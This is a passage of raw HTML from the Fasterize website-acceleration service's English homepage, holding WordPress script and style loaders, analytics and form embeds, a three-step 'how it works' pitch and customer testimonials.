g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel="stylesheet" media="all" href="https://www.fasterize.com/fstrz/a64ce037d5c2542aa4c33fa2521e438e4cda1e09b342b41f1e74143fb9203e1f.css?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fcrayon-syntax-highlighter%2Fcss%2Fmin%2Fcrayon.min.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-includes%2Fcss%2Fdist%2Fblock-library%2Fstyle.min.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fbootstrap-for-contact-form-7%2Fassets%2Fdist%2Fcss%2Fstyle.min.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fassets%2Fcss%2Fanimate.css%3Ffrz-v%3D454" /> <link rel="stylesheet" media="all" href="https://www.fasterize.com/fstrz/70080f470feb41ff2a611bf432f3631ec3d6ccc4ae3e46904d4e3b3622845065.css?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fassets%2Fcss%2Flsow-frontend.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fassets%2Fcss%2Flsow-layouts.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fassets%2Fcss%2Ficomoon.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fperfect-pullquotes%2Fperfect-pullquotes.css%3Ffrz-v%3D454" /> <link rel="stylesheet" media="all" href="https://www.fasterize.com/fstrz/9e2f01f6cd76f89fa8991b413c5b005258eb09900cf3506de79d2443e4e47650.css?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fsiteorigin-panels%2Fcss%2Ffront-flex.min.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fwp-font-awesome%2Ffont-awesome%2Fcss%2Ffont-awesome.min.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fwp-font-awesome%2Ffont-awesome%2Fcss%2Ffontawesome-all.min.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fwp-pro-quiz%2Fcss%2FwpProQuiz_front.min.css%3Ffrz-v%3D454" /> <link rel="stylesheet" media="all" href="https://www.fasterize.com/fstrz/88ca35d5cfd83746cb5c86cbdfc733e24eb4ebfcad7dc792223c94dce8f60e52.css?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fwp-syntax%2Fcss%2Fwp-syntax.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fthemes%2Ffasterize%2Fstyle.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fadd-to-any%2Faddtoany.min.css%3Ffrz-v%3D454" /> <script type="text/frzjs" frz_orig_src="https://www.fasterize.com/fstrz/083afcdabd670550dda0704bae5a12c4fa4e44f24bc95c299ad7ab6d5d891a84.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-includes%2Fjs%2Fjquery%2Fjquery.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-includes%2Fjs%2Fjquery%2Fjquery-migrate.min.js%3Ffrz-v%3D454" orig_index="1"></script> <script type='text/frzjs' orig_index="2"> /* <![CDATA[ */ var CrayonSyntaxSettings = {"version":"_2.7.2_beta","is_admin":"0","ajaxurl":"https:\/\/www.fasterize.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""}; var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"}; /* ]]> */ </script> <script type="text/frzjs" frz_orig_src="https://www.fasterize.com/fstrz/2a4380d24906eb55ec32e3d636685a3b8817ab1e8262f5d444dd60d5c9bf440f.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fcrayon-syntax-highlighter%2Fjs%2Fmin%2Fcrayon.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fadd-to-any%2Faddtoany.min.js%3Ffrz-v%3D454" orig_index="3"></script> <link rel='https://api.w.org/' href='https://www.fasterize.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.fasterize.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.fasterize.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://www.fasterize.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.fasterize.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.fasterize.com%2Fen%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.fasterize.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.fasterize.com%2Fen%2F&#038;format=xml" /> <script data-cfasync="false" type="text/frzjs" orig_index="4"> window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={}; (function(d,s,a,b){a=d.createElement(s);b=d.getElementsByTagName(s)[0];a.async=1;a.src="https://static.addtoany.com/menu/page.js";b.parentNode.insertBefore(a,b);})(document,"script"); </script> <style type="text/css" media="screen">.hbspt-form{ margin: 0 auto; padding: 0 15px 15px 15px; line-height:150%; width:100%!important;} .hbspt-form .hs-email > label > span { font-size: 16px; letter -spacing: 2px;} .hs-form .hs-button { font-size: 16px !important; font-weight: bold; box-shadow:none !important; text-shadow: none !important; border-radius:10px!important; padding: 15px !important; background-color:rgb(250,151,48) !important; width: 100%;} @media (min-width: 1440px) { .hs-form .hs-button { width: 40%; } } input.hs-input {height: 50px!important; border-radius:10px!important; color:#2f5976!important; padding: 0 0 0 15px!important; margin-bottom:20px; width:100%;} .hs-form .hs-website .hs-email {height: 50px!important; width:100%!important; ; color:#2f5976!important; box-sizing:inherit} .hs-form .hs_number_of_page_views .hs-input {height: 50px!important; color:#2f5976!important; padding: 0 20px 0 20px!important; width:100%; margin-bottom:20px; } .hs-form .hs-website .hs-input {height: 50px!important; width:100%!important; color:#2f5976!important; padding: 0 0 0 15px!important;} .hbspt-form .inputs-list>li label {display: inline-block;} </style><link rel="alternate" href="https://www.fasterize.com/fr/" hreflang="fr" /> <link rel="alternate" href="https://www.fasterize.com/en/" hreflang="en" /> <link rel="alternate" href="https://www.fasterize.com/" hreflang="x-default" /> <style type="text/css"> div.wpcf7 .ajax-loader { background-image: url('https://www.fasterize.com/wp-content/plugins/contact-form-7/images/ajax-loader.gif?frz-v=454'); } </style> <script type="text/frzjs" id="sns_global_scripts_in_head" orig_index="5"> (function() { var s=document.createElement('script'); s.type='text/javascript'; s.async=true; s.src='//www.link-page.info/tracking_17074.js'; (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s); })(); </script> <noscript><p><img style="display:none" src="//www.link-page.info/tracking_17074.png" /></p></noscript> <!-- tracking --> <script></script> <style type="text/css" media="all" id="siteorigin-panels-layouts-head">/* Layout 776 */ #pgc-776-0-0 , #pgc-776-1-0 , #pgc-776-2-0 { width:100%;width:calc(100% - ( 0 * 30px ) ) } #pl-776 #panel-776-0-0-0 , #pl-776 #panel-776-1-0-0 , #pl-776 #panel-776-2-0-0 { } #pg-776-0 , #pg-776-1 , #pl-776 .so-panel { margin-bottom:30px } #pl-776 .so-panel:last-child { margin-bottom:0px } @media (max-width:780px){ #pg-776-0.panel-no-style, #pg-776-0.panel-has-style > .panel-row-style , #pg-776-1.panel-no-style, #pg-776-1.panel-has-style > .panel-row-style , #pg-776-2.panel-no-style, #pg-776-2.panel-has-style > .panel-row-style { -webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column } #pg-776-0 > .panel-grid-cell , #pg-776-0 > .panel-row-style > .panel-grid-cell , #pg-776-1 > .panel-grid-cell , #pg-776-1 > .panel-row-style > .panel-grid-cell , #pg-776-2 > .panel-grid-cell , #pg-776-2 > .panel-row-style > .panel-grid-cell { width:100%;margin-right:0 } #pl-776 .panel-grid-cell { padding:0 } #pl-776 .panel-grid .panel-grid-cell-empty { display:none } #pl-776 .panel-grid .panel-grid-cell-mobile-last { margin-bottom:0px } } </style><link rel="preload" as="script" href="https://www.fasterize.com/fstrz/083afcdabd670550dda0704bae5a12c4fa4e44f24bc95c299ad7ab6d5d891a84.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-includes%2Fjs%2Fjquery%2Fjquery.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-includes%2Fjs%2Fjquery%2Fjquery-migrate.min.js%3Ffrz-v%3D454" /><link rel="preload" as="script" href="https://www.fasterize.com/fstrz/2a4380d24906eb55ec32e3d636685a3b8817ab1e8262f5d444dd60d5c9bf440f.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fcrayon-syntax-highlighter%2Fjs%2Fmin%2Fcrayon.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fadd-to-any%2Faddtoany.min.js%3Ffrz-v%3D454" /><link rel="preload" as="script" href="https://www.fasterize.com/fstrz/97d692b39c752134eee64a2d01f51d422e2366ffd1d4e09a98bc736485e8dfe8.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fcontact-form-7%2Fincludes%2Fjs%2Fscripts.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-includes%2Fjs%2Fjquery%2Fjquery.form.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fbootstrap-for-contact-form-7%2Fassets%2Fdist%2Fjs%2Fscripts.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fassets%2Fjs%2Fmodernizr-custom.min.js%3Ffrz-v%3D454" /><link rel="preload" as="script" href="https://www.fasterize.com/wp-content/plugins/livemesh-siteorigin-widgets-pro/assets/js/jquery.waypoints.min.js?frz-v=454" /><link rel="preload" as="script" href="https://www.fasterize.com/fstrz/d7607132eb13d897058de8eda7df2c8433eda8edbc584c0a9150e0ffb9fb0d7b.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fassets%2Fjs%2Flsow-frontend.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-includes%2Fjs%2Funderscore.min.js%3Ffrz-v%3D454" /><link rel="preload" as="script" href="https://www.fasterize.com/fstrz/7ff53dc693df6d8741b72cbf67ec95e4293bd78475fd7ad40bfb05451733f990.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fwordpress-popup%2Fassets%2Fjs%2Ffront.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fwp-syntax%2Fjs%2Fwp-syntax.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fthemes%2Ffasterize%2Fjs%2Fnavigation.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fthemes%2Ffasterize%2Fjs%2Fskip-link-focus-fix.js%3Ffrz-v%3D454" /><link rel="preload" as="script" href="https://www.fasterize.com/fstrz/4dc37e8549e1f70ae557a319d3ce9ddf415a421325aac46f5e823007c0891450.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fthemes%2Ffasterize%2Fjs%2Fbootstrap.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-includes%2Fjs%2Fwp-embed.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fassets%2Fjs%2Fjquery.flexslider.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fincludes%2Fwidgets%2Flsow-testimonials-slider-widget%2Fjs%2Ftestimonials.min.js%3Ffrz-v%3D454" /><link rel="preload" as="script" href="https://www.fasterize.com/fstrz/67be4050289c3d73fb3255dd045fd72b2ca1e2972fcec4fa73ad330045574b93.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Faddon-so-widgets-bundle%2Fjs%2Fowl.carousel.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fslickquiz%2Fslickquiz%2Fjs%2FslickQuiz.js%3Ffrz-v%3D454" /><link rel="preload" as="script" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.js" /><!-- Google Tag Manager --> <script> if(window.location && window.location.hostname && (location.hostname=='www.fasterize.com' || location.hostname=='info.fasterize.com')) (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= ' https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f) ; })(window,document,'script','dataLayer','GTM-T7PN6TW'); </script> <!-- End Google Tag Manager --></head> <body class="home page-template page-template-front-page page-template-front-page-php page page-id-776 siteorigin-panels siteorigin-panels-before-js siteorigin-panels-home group-blog"> <div class="main-gradiant"> <header class="top" role="header"> <nav class="navbar navbar-default" role="navigation"> <div class="container-fluid"> <div class="navbar-top"><ul id="menu-header-menu-top-en" class="nav navbar-right nav-pills"><li id="menu-item-1903" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1903"><a href="https://my.fasterize.com">Log in</a></li> </ul></div> <!-- Brand and toggle get grouped for better mobile display --> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="http://www.fasterize.com/"> <img alt="Fasterize_logo_mini" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADMAAAAhCAMAAABDYWOIAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAABFUExURUxpcf///////////////////////////////////////////////////////////////////////////////////////4aDdakAAAAWdFJOUwBcrcIHE+D69IZ2IuxoRIHWlucwzaEkttZiAAABG0lEQVQ4y5VVURaDIAxDEQEVRJ3c/6hDNvawtMj6o68aY5u0MAZilV6u103vUyyO64NVYg8v7eE6+3uM00BiEJ6E6lhbdDnqHNpASw7i4m+eAIJMk/SPsQHM6Buia+GRm41VfJs/En3ICccZVGZQiM0ge4L89HIoJlczfVWsv9TMtNIhZRResQp/L5Z7bmLKq4B5EV3qS4lCrs4zhWcnyL0o/QWPzy0i206axkRtvmLcBkPWeTjmusijSZ9ppPufehRpLgu1Sb2s8IhSnU8vaR84YKTkg5rfrmHZIMTVfR1m5SiKNfXpmYUpqrnNj/P+7zlt2QblPgBxLCWEP224voQ87beSh9qjcZ4GjpRC7+s4txZBVM4FhAeeP29QZUpZRrpJ6wAAAABJRU5ErkJggg==" style="width:51px;position:relative;margin-top:-5px"> fasterize </a> </div> <div id="bs-example-navbar-collapse-1" class="collapse navbar-collapse navbar-ex1-collapse"><ul id="menu-header-menu-en" class="nav navbar-nav navbar-right"><li id="menu-item-1097" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1097 dropdown"><a title="Solution" href="#" data-toggle="dropdown" class="btn btn-link navbar-btn" aria-haspopup="true">Solution <span class="caret"></span></a> <ul role="menu" class="dropdown-menu"> <li id="menu-item-3110" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3110"><a title="Our vision" href="https://www.fasterize.com/en/our-vision/">Our vision</a></li> <li id="menu-item-3106" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3106"><a title="Features" href="https://www.fasterize.com/en/features/">Features</a></li> <li id="menu-item-3112" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3112"><a title="How does it work?" href="https://www.fasterize.com/en/how-does-it-work/">How does it work?</a></li> <li id="menu-item-2093" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2093"><a title="Expertise" href="https://www.fasterize.com/en/tackle-your-web-performance-issues-with-our-expert-support/">Expertise</a></li> </ul> </li> <li id="menu-item-1687" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1687"><a title="Pricing" href="https://www.fasterize.com/en/pricing/" class="btn navbar-btn btn-link">Pricing</a></li> <li id="menu-item-3636" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3636"><a title="Our clients" href="https://www.fasterize.com/en/clients/" class="btn navbar-btn btn-link">Our clients</a></li> <li id="menu-item-1897" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1897 dropdown"><a title="Resources" href="#" data-toggle="dropdown" class="btn btn-link navbar-btn" aria-haspopup="true">Resources <span class="caret"></span></a> <ul role="menu" class="dropdown-menu"> <li id="menu-item-1899" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1899"><a title="White Papers" href="https://www.fasterize.com/en/white-papers/">White Papers</a></li> <li id="menu-item-1907" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1907"><a title="Blog" href="https://www.fasterize.com/en/blog/">Blog</a></li> <li id="menu-item-1906" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1906"><a title="Documentation" href="http://support.fasterize.com">Documentation</a></li> <li id="menu-item-1905" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1905"><a title="Platform Status" href="http://status.fasterize.com">Platform Status</a></li> </ul> </li> <li id="menu-item-3524" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3524"><a title="Ask a demo" href="https://info.fasterize.com/ask-for-a-demo" class="btn navbar-btn btn-link">Ask a demo</a></li> </ul></div> </div> </nav> </header> <div id="pl-776" class="panel-layout" ><div id="pg-776-0" class="panel-grid panel-no-style" ><div id="pgc-776-0-0" class="panel-grid-cell" ><div id="panel-776-0-0-0" class="so-panel widget widget_text panel-first-child panel-last-child" data-index="0" > <div class="textwidget"> <section class="container" id="main-content" style="width: 80%"> <div class="row"> <div class="col-xs-12 col-md-6 col-md-push-6 col-sm-6 col-sm-push-6 main-visual-div"> <img alt="Home-md" id="main-visual" style="padding: 50px 0 0 0" src="https://www.fasterize.com/wp-content/uploads/2016/01/home-md.png?frz-v=454"> </div> <div class="col-xs-12 col-md-6 col-md-pull-6 col-sm-6 col-sm-pull-6"> <h1>Speed up your website</h1> <p class="lead">What impact does Fasterize have on your website’s loading times? Request your webperf report:</p> <div style="background: #2f5976; padding: 10px; border-radius: 15px; filter: drop-shadow(0 0 0.75rem #2f5976);"><!--[if lte IE 8]> <script charset="utf-8" type="text/javascript" src="//js.hsforms.net/forms/v2-legacy.js"></script> <![endif]--> <script charset="utf-8" type="text/javascript" src="//js.hsforms.net/forms/v2.js"></script> <script> hbspt.forms.create({ portalId: "3267766", formId: "599a6546-25ee-4f39-9dac-baafa99f1ce2" }); </script> </div> </div> </div> <div class="row" id="second_part"> <div class="col-xs-12 text-center"> <p class="step">3 simple steps</p> </div> <div class="col-xs-12 text-center"> <h2>How does Fasterize work?</h2> </div> </div> <div class="row" id="second_part_content"> <div class="col-sm-4 text-center"> <img alt="Icon_configuration" src="data:image/svg+xml;charset=utf-8,%3Csvg%20width%3D%22102%22%20height%3D%22102%22%20viewBox%3D%220%200%20102%20102%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Ctitle%3Eicon_configuration%3C%2Ftitle%3E%3Cg%20fill%3D%22%23FFF%22%20fill-rule%3D%22evenodd%22%3E%3Cpath%20d%3D%22M36%2052a9%209%200%200%200%200%2018h30a9%209%200%200%200%200-18H36zm30%2016a7%207%200%201%200%200-14%207%207%200%200%200%200%2014z%22%2F%3E%3Ccircle%20cx%3D%2236%22%20cy%3D%2238%22%20r%3D%227%22%2F%3E%3Cpath%20d%3D%22M27%2038a9%209%200%200%200%209%209h30a9%209%200%200%200%200-18H36a9%209%200%200%200-9%209zm39-6a6%206%200%200%201%200%2012H36a6%206%200%200%201%200-12h30z%22%2F%3E%3Cpath%20d%3D%22M102%2051c0-28.167-22.833-51-51-51S0%2022.833%200%2051s22.833%2051%2051%2051%2051-22.833%2051-51zM2%2051C2%2023.938%2023.938%202%2051%202s49%2021.938%2049%2049-21.938%2049-49%2049S2%2078.062%202%2051z%22%2F%3E%3C%2Fg%3E%3C%2Fsvg%3E"> <h3>1. Sign in</h3> <p>Just sign in to Fasterize. No need to modify your code.</p> </div> <div class="col-sm-4 text-center"> <img alt="Icon_branchement" src="data:image/svg+xml;charset=utf-8,%3Csvg%20width%3D%22102%22%20height%3D%22102%22%20viewBox%3D%220%200%20102%20102%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Ctitle%3Eicon_branchement%3C%2Ftitle%3E%3Cg%20fill%3D%22%23FFF%22%20fill-rule%3D%22evenodd%22%3E%3Crect%20x%3D%2240%22%20y%3D%2224%22%20width%3D%225%22%20height%3D%2210%22%20rx%3D%222%22%2F%3E%3Crect%20x%3D%2253%22%20y%3D%2224%22%20width%3D%225%22%20height%3D%2210%22%20rx%3D%222%22%2F%3E%3Cpath%20d%3D%22M39.008%2038A2.998%202.998%200%200%200%2036%2040.996v4.433c0%20.552.288%201.34.647%201.767l4.853%205.75C42.924%2054.631%2045.861%2056%2048.082%2056h1.836c2.21%200%205.195-1.33%206.671-2.978l4.75-5.303c.365-.407.661-1.183.661-1.733V40.99A2.997%202.997%200%200%200%2058.992%2038H39.008zM47%2068.998A7.005%207.005%200%200%200%2054%2076h5a2%202%200%201%200%200-4h-5c-1.653%200-3-1.346-3-3.002V62a2%202%200%201%200-4%200v6.998z%22%2F%3E%3Cpath%20d%3D%22M102%2051c0-28.167-22.833-51-51-51S0%2022.833%200%2051s22.833%2051%2051%2051%2051-22.833%2051-51zM2%2051C2%2023.938%2023.938%202%2051%202s49%2021.938%2049%2049-21.938%2049-49%2049S2%2078.062%202%2051z%22%2F%3E%3C%2Fg%3E%3C%2Fsvg%3E"> <h3>2. Plug in</h3> <p>A quick change of your DNS records and your website will be Fasterized!</p> </div> <div class="col-sm-4 text-center"> <img alt="Icon_rapports" src="data:image/svg+xml;charset=utf-8,%3Csvg%20width%3D%22102%22%20height%3D%22102%22%20viewBox%3D%220%200%20102%20102%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Ctitle%3Eicon_rapports%3C%2Ftitle%3E%3Cg%20fill%3D%22%23FFF%22%20fill-rule%3D%22evenodd%22%3E%3Cpath%20d%3D%22M66%2075.95L64%2078H32c-1.65%200-3-1.344-3-3.001V28A2.993%202.993%200%200%201%2031.994%2025h41.012C74.656%2025%2076%2026.34%2076%2027.993v37.709L73.757%2068h-5.76A2%202%200%200%200%2066%2069.992v5.958zM37%2038v3h31v-3H37zm0%2021v3h31v-3H37zm0-14v3h9v-3h-9zm0%207v3h20v-3H37zm23%200v3h8v-3h-8zm-11-7v3h19v-3H49z%22%2F%3E%3Cpath%20d%3D%22M102%2051c0-28.167-22.833-51-51-51S0%2022.833%200%2051s22.833%2051%2051%2051%2051-22.833%2051-51zM2%2051C2%2023.938%2023.938%202%2051%202s49%2021.938%2049%2049-21.938%2049-49%2049S2%2078.062%202%2051z%22%2F%3E%3C%2Fg%3E%3C%2Fsvg%3E"> <h3>3. Enjoy!</h3> <p>Access valuable stats and metrics directly from your dashboard.</p> </div> </div> <div class="row know_more"> <div class="col-xs-12 text-center"> <a href="https://www.fasterize.com/en/our-vision/" class="btn btn-white" id="know_more_button">Discover our service</a> </div> </div> </section> </div></div></div> </div></div></div><div id="pg-776-1" class="panel-grid panel-no-style" ><div id="pgc-776-1-0" class="panel-grid-cell" ><div id="panel-776-1-0-0" class="so-panel widget widget_lsow-testimonials-slider panel-first-child panel-last-child" data-index="1" ><div class="so-widget-lsow-testimonials-slider so-widget-lsow-testimonials-slider-default-d75171398898"> <div class="lsow-testimonials-slider lsow-flexslider lsow-container" data-slideshow_speed="5000" data-animation_speed="600" data-pause_on_action="1" data-pause_on_hover="1" data-direction_nav="1" data-so_field_container_state="open" > <div class="lsow-slides"> <div class="lsow-slide lsow-testimonial-wrapper"> <div class="lsow-testimonial"> <div class="lsow-testimonial-text"> <i class="lsow-icon-quote"></i> With Fasterize, we noticed a gain on our Speed Index of around 27%, which is great. Our business metrics have significantly improved as well. </div> <div class="lsow-testimonial-user"> <div class="lsow-image-wrapper"> <img width="150" height="150" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJYAAACWCAMAAAAL34HQAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAzUExURUxpcQAAAHQODwEBAQAAAAEBAQAAAAAAAAAAAAEBAe4hJO4fIO0iJe8eIOomKAEBAe0iJFRG12gAAAAPdFJOUwBXEpA4o2ojr9WrhtJI/mPq1FMAAAHaSURBVHja7ZjJloMgEAAjEoSYGfL/XztZ3ECQRc2bQ9XNPGiKxabN5QIAAAAAAAAAAAAAAAAAAAAAAOdzfTE/Cu85l9uTI7Xsi/mx855zeTxBC61jtW6uVn+KVjHi6fMzav0ctmZ7tR4+/13rcx6sNdG+Zmghq7X0ECHQtF9K3dzAW2Jm0aLuyCu7FWJeMhGSCq9H47Wo0PIiNLEFu8d6WNv6d96qRbFWIsJitVY99LRTndNBjj8rZYJR01qBMQJWv/fZazjs2ukfiGmc/ZRFWsaZbWiMQegtt2jkS1ziP6yDprS65cSnqanQxTMdej+GDGqJrXyQ0lpNRPk/9ONh74cEkcw5av3iBIdNaSUy3fgK9o+8VPjZAIcaLbOe68agXZ5WgHwtGUljbXzQ9+m71miJbC0V0TIJrbZGqztTS35hE7vyTcw88vuqUzdrxY5b2ahtpJo5OEH4BWsqOUayp9yTTjOq/S9cPsKbiIjUNqtNml6sNnpVa6ecaIuuau1ENTannJ1qDinHqkMHyy0jpd5Z2CjZGGvzimybqtHsN8rApJfZrOSPKZplzhdRk5zHZh2e9Ykhk58xob+opt1Pmevqj31VKgUAAAAAAAAAAAAAAAAAAAAA5/AHhD9PWMrB7HIAAAAASUVORK5CYII=" class="lsow-image full" alt=""> </div> <div class="lsow-text"> <h4 class="lsow-author-name">Celio</h4> <div class="lsow-author-credentials">Julien Debray, Technical Architect</div> </div> </div> </div> </div> <div class="lsow-slide lsow-testimonial-wrapper"> <div class="lsow-testimonial"> <div class="lsow-testimonial-text"> <i class="lsow-icon-quote"></i> <em>All of our websites (in Europe) load faster thanks to Fasterize.</em> </div> <div class="lsow-testimonial-user"> <div class="lsow-image-wrapper"> <img width="150" height="150" 